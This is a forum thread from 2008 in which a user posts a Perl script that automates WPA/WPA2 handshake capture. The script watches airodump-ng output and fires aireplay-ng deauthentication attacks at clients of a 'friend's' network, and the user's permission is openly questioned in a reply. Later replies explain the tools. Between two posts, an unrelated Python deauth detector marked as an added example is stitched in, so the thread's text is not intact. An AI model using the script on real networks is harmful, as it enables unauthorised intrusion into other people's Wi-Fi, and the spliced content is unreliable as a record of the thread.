
Thread: [GUIDE] How to make WPA/WPA2 crack automatic!

  1. #1
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14

    [GUIDE] How to make WPA/WPA2 crack automatic!

    Hi,
    yesterday I asked a question in Tutorials & Guides without receiving any reply.
    I'm supposing that my problem is quite common, so I decided to ... try to solve it.
    My problem: my friend has a WPA2-protected wireless network. I read the fantastic guide on how to crack WPA/WPA2 and I tried to use it. The problem is that when I start airodump-ng there are no clients associated to the network. Maybe my friend connects to the network when I'm at work.
    How to solve it?
    If I read the guide correctly, it seems that the last part (running aircrack-ng) could be done "offline" when there are no clients associated. The client-dependent part of the whole process is capturing the handshake, and often there are no clients when you want it.
    So I wrote a Perl script which should help you to find the handshake.
    The typical scenario is: in the morning you start a shell in which you prepare your wireless adapter (monitor mode) and start airodump-ng.
    From crontab or another shell you start my Perl script in the background and then you ... go to work.
    The purpose is: when you come back from work, you have a file with the handshake key (if during the day your friend connects to his network...) and this lets you continue the cracking process.
    I wanted to post the topic in the Tutorials & Guides section but .... I can't write to that section.
    I have to paste the script below because I can't find a way to insert an attachment.
    I finished writing the script 5 minutes ago and I'm at work, so I haven't tested it (anyway there are no dangerous operations...).
    Suggestions and enhancements are welcome.

    +++++++++++++++++++++++++++
    Perl Script
    +++++++++++++++++++++++++++

    #!/usr/bin/perl
    # Author: Spinmar
    # Date: 20/06/2008
    # -------------------------------

    use POSIX qw(setsid);
    use Getopt::Std;

    $|=1;

    my $SLEEP_TIMEOUT = 10;

    getopt('iow');

    if (!defined($opt_i) && !defined($opt_o) && !defined($opt_w)) {
        print STDERR "usage: check_airodump.pl -i <file(\.txt) with option -w in airodump> -o <file_out_wpa_handshake> -w <wireless_adapter>\n";
        exit;
    }

    my $FILE_OUT_AIRODUMP = $opt_i;

    if (!-e $FILE_OUT_AIRODUMP) {
        print STDERR "File $FILE_OUT_AIRODUMP doesn't exist!! Please insert absolute path\n";
        exit;
    }

    my $FILE_OUT_HANDSHAKE = $opt_o;

    my $WIRELESS_ADAPTER = $opt_w;

    my $BSSID = '';
    my $flag_exit = 0;

    while (1) {
        INIT:
        if ($flag_exit) {
            # kill aireplay-ng (it should already be stopped) and airodump-ng processes

            my $airodump_ng = `ps aefx | grep 'airodump-ng' | grep -v grep`;
            if (!defined($airodump_ng) || (length($airodump_ng) < 5)) {
                print STDERR "No airodump-ng in execution\n";
                exit;
            }
            my @tmp = split /\s+/, $airodump_ng;
            if ($#tmp < 2) {
                print STDERR "Error getting airodump-ng pid\n";
                exit;
            }
            my $pid_process = $tmp[0];
            if ($pid_process !~ /\d+/) {
                print STDERR "Pid airodump-ng strange!! Not a number\n";
                exit;
            }
            my $stop_airodump = `kill -9 $pid_process`;

            my $aireplay_ng = `ps aefx | grep 'aireplay-ng' | grep -v grep`;
            if (!defined($aireplay_ng) || (length($aireplay_ng) < 5)) {
                print STDERR "[INFO]No aireplay in execution\n";
                exit;
            }
            @tmp = split /\s+/, $aireplay_ng;
            if ($#tmp < 2) {
                print STDERR "[INFO]Error getting aireplay-ng pid\n";
                exit;
            }
            $pid_process = $tmp[0];
            if ($pid_process !~ /\d+/) {
                print STDERR "[INFO]Pid aireplay-ng strange!! Not a number\n";
                exit;
            }
            my $stop_aireplay = `kill -9 $pid_process`;
            exit;
        }

        $num = 0;
        my $station = 0;
        my $pwr = 0;
        my %list_bssid = ();
        my %list_bssid_station = ();

        open(FILEHANDLE, "<$FILE_OUT_AIRODUMP") or die("Error to open file $FILE_OUT_AIRODUMP\n");
        LOOP: while(<FILEHANDLE>) {
            if ($num == 0) {
                # First line: look for the WPA handshake
                chop($_);
                if ($_ =~ /WPA handshake:\s(.+)$/) {
                    # FOUND!!!
                    # The handshake output file contains:
                    # <BSSID of examined network> - <WPA handshake>
                    my $hand_shake = $1;
                    open(FILEHANDLE_HS, ">$FILE_OUT_HANDSHAKE") or die("Error to open file $FILE_OUT_HANDSHAKE\n");
                    print FILEHANDLE_HS "$BSSID - $hand_shake\n";
                    close (FILEHANDLE_HS);
                    $flag_exit = 1;
                    close (FILEHANDLE);
                    goto INIT;
                }
            }
            chop($_);
            my @tmp = split /\s+/, $_;
            if ($#tmp == 0) {
                $num++;
                next LOOP;
            }

            if ($tmp[1] eq 'PWR') {
                $pwr = 1;
                $num++;
                next LOOP;
            }
            elsif ($tmp[1] eq 'STATION') {
                $station = 1;
                $pwr = 0;
                $num++;
                next LOOP;
            }
            else {
                if ($pwr) {
                    # I only keep WPA/WPA2 networks.
                    # list_bssid = BSSID -> ESSID
                    if (($tmp[8] eq 'WPA') || ($tmp[8] eq 'WPA2')) {
                        $list_bssid{$tmp[0]} = $tmp[$#tmp];
                    }
                }
                elsif ($station) {
                    if (($tmp[0] =~ /\w\w:\w\w:\w\w:\w\w:\w\w:\w\w/) && ($tmp[1] =~ /\w\w:\w\w:\w\w:\w\w:\w\w:\w\w/) && (exists($list_bssid{$tmp[0]}))) {
                        $list_bssid_station{$tmp[0]} = $tmp[1];
                    }
                }

            }
            #my @tmp = split /\|/, $_;

            $num++;
        }
        close (FILEHANDLE);

        # Check if there are other aireplay-ng processes
        my $aireplay_ng = `ps aefx | grep 'aireplay-ng' | grep -v grep`;
        if (defined($aireplay_ng) && (length($aireplay_ng) > 5)) {
            goto DORMI;
        }

        my ($key, $value);

        while(($key, $value) = each(%list_bssid_station)) {
            $BSSID = $key;
            system("nohup aireplay-ng -0 1 -a $key -c $value $WIRELESS_ADAPTER &");
            # Another way to do this
            #my $pid = fork();
            #die "Can't fork $!" unless defined $pid;
            #if (!$pid) {
            #open (STDIN "</dev/null");
            #open (STDOUT ">/dev/null");
            #open (STDERR ">&STDOUT");
            #exec "aireplay-ng -0 1 -a $key -c $value $WIRELESS_ADAPTER";
            #exit(0);
            #}
            goto DORMI;
        }

        DORMI:
        sleep($SLEEP_TIMEOUT);
    }

    exit(0);

    ++++++++++++++++++++++++++++++++++++
    End
    ++++++++++++++++++++++++++++++++++++

    Best regards

  2. #2
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14


    Couldn't you just leave airodump-ng running until you get home?
    And did you also ask your "friend" if you can do this? From what you wrote it sounds like you don't have permission.

  3. #3
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14


    My friend and I made a bet: I have 5 days to find his password.
    The prize is a ... pizza.
    If I leave airodump-ng running all day and my friend connects when I'm not present, how can I run aireplay-ng?

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,124


    Originally Posted by jackabee:
        Couldn't you just leave airodump-ng running until you get home?
        And did you also ask your "friend" if you can do this? From what you wrote it sounds like you don't have permission.
    Yes. Although I admire the scripting effort all you have to do is leave airodump running and when a client connects the handshake is captured.

    Aireplay is for deauthing an already connected client from the network and forcing him to reconnect thus capturing the handshake.
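The deauthentication that aireplay-ng -0 sends (as pureh@te describes above) is visible on the air as a burst of 802.11 management frames of subtype 12 aimed at one BSSID, which is what a wireless IDS looks for. The Python below is an added example, not code from the thread or from aircrack-ng: a minimal burst detector over raw 802.11 frames. The frames, addresses, 2-second window and threshold of 5 are all constructed or assumed for the demonstration.

```python
# Added example (not from the thread): flag bursts of 802.11 deauthentication frames.
# Assumes raw frames with no radiotap header or FCS; window/threshold values are illustrative.
import struct
from collections import defaultdict

DEAUTH_FC = 0xC0  # frame control byte 0: type 0 (management), subtype 12 (deauth)

def mac_str(raw):
    return ':'.join(f'{b:02x}' for b in raw)

def parse_deauth(frame):
    """Return (bssid, dest, source, reason_code) for a deauth frame, else None."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC:
        return None
    dest, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    reason = struct.unpack('<H', frame[24:26])[0]  # little-endian reason code after the 24-byte header
    return mac_str(bssid), mac_str(dest), mac_str(src), reason

def deauth_bursts(frames, window_s=2.0, threshold=5):
    """frames: iterable of (timestamp, raw_frame). Returns [(bssid, count, window_start)]
    for each BSSID that saw at least `threshold` deauth frames inside any window_s span."""
    seen = defaultdict(list)
    for ts, raw in frames:
        parsed = parse_deauth(raw)
        if parsed:
            seen[parsed[0]].append(ts)
    alerts = []
    for bssid, stamps in seen.items():
        stamps.sort()
        start = 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > window_s:  # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                alerts.append((bssid, end - start + 1, stamps[start]))
                break  # one alert per BSSID is enough here
    return alerts

def sample_frame(fc, dest, src, bssid, reason=7):
    """Constructed test frame: 24-byte MAC header followed by a 2-byte reason code."""
    hexmac = lambda m: bytes.fromhex(m.replace(':', ''))
    header = bytes([fc, 0x00, 0x00, 0x00]) + hexmac(dest) + hexmac(src) + hexmac(bssid) + b'\x00\x00'
    return header + struct.pack('<H', reason)

AP, CLIENT = '00:11:22:33:44:55', 'aa:bb:cc:dd:ee:ff'  # constructed addresses
# Constructed capture: eight deauths 100 ms apart against AP (a burst) plus one beacon (FC 0x80) to ignore.
CAPTURE = [(i * 0.1, sample_frame(DEAUTH_FC, CLIENT, AP, AP)) for i in range(8)]
CAPTURE.append((0.5, sample_frame(0x80, 'ff:ff:ff:ff:ff:ff', AP, AP)))
# Three deauths a minute apart: ordinary roaming noise, not a burst.
QUIET = [(i * 60.0, sample_frame(DEAUTH_FC, CLIENT, AP, AP)) for i in range(3)]
```

On a real capture the frames would come from a monitor-mode interface with the radiotap header stripped first; `deauth_bursts(CAPTURE)` reports the burst while `deauth_bursts(QUIET)` stays silent.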

  5. #5
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14


    Originally Posted by pureh@te:
        Yes. Although I admire the scripting effort all you have to do is leave airodump running and when a client connects the handshake is captured.

        Aireplay is for deauthing an already connected client from the network and forcing him to reconnect thus capturing the handshake.
    Oh my god!!
    I didn't understand aireplay-ng!!
    So if there are no clients and I leave airodump-ng running, is the handshake captured when a client connects? But if it disconnects, does the handshake remain in the airodump-ng window?

  6. #6
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008


    Originally Posted by spinmar:
        Oh my god!!
        I didn't understand aireplay-ng!!
        So if there are no clients and I leave airodump-ng running, is the handshake captured when a client connects? But if it disconnects, does the handshake remain in the airodump-ng window?
    As long as you write the captured data to a file, the handshake will not disappear even if the client disconnects at once.
    -Monkeys are like nature's humans.

  7. #7
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    14


    The prize is a ... pizza
    Man, get your ass moving, you can't miss out on this.
